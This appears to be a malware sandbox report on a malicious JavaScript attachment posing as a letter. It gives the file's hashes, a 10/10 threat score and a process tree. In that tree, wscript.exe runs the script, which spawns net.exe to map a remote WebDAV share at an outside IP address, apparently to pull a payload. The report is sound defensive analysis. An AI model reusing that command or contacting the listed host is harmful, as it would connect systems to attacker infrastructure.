Overview

overview

10

Static

static

1

Letter_y50...9b2.js

windows10-1703-x64

10

Letter_y50...9b2.js

windows10-2004-x64

10

Letter_y50...9b2.js

windows11-21h2-x64

10

Analysis

  • max time kernel
    1685s
  • max time network
    1752s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240221-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240221-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-02-2024 01:03

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Letter_y50_70c450058-02a73934b0046-0399b2.js

  • Size

    732KB

  • MD5

    d6aad7545c215011427728a3d5d802d5

  • SHA1

    514e6350dde291e84912754efd3e5da8ed0ae213

  • SHA256

    285248be52ad6d59a7250c048c91a3cf31adf3a6b9d1967de595e4545e34323d

  • SHA512

    c18b8db78cf9d41bc40cdc1178f8bbaadbc9a496202278b427813c34c77bb35431ce784fa6a0ece55869618ae5ca0303dd77d73621c48266e67c4554915a0fa8

  • SSDEEP

    12288:IYHd/4+/TIJoJ+QvFhaK+rpi3kKLgzfvv++oFhSuNGY:L/4+bIawQv3aK+r2kKL6fcFvT

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Runs net.exe

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\Letter_y50_70c450058-02a73934b0046-0399b2.js
    1⤵
      PID:396
    • C:\Windows\system32\net.exe
      net use A: \\178.23.190.199@80\share\ /persistent:no
      1⤵
      • Process spawned unexpected child process
      PID:2780

    Network

    MITRE ATT&CK Matrix

    Replay Monitor

    Loading Replay Monitor...

    Downloads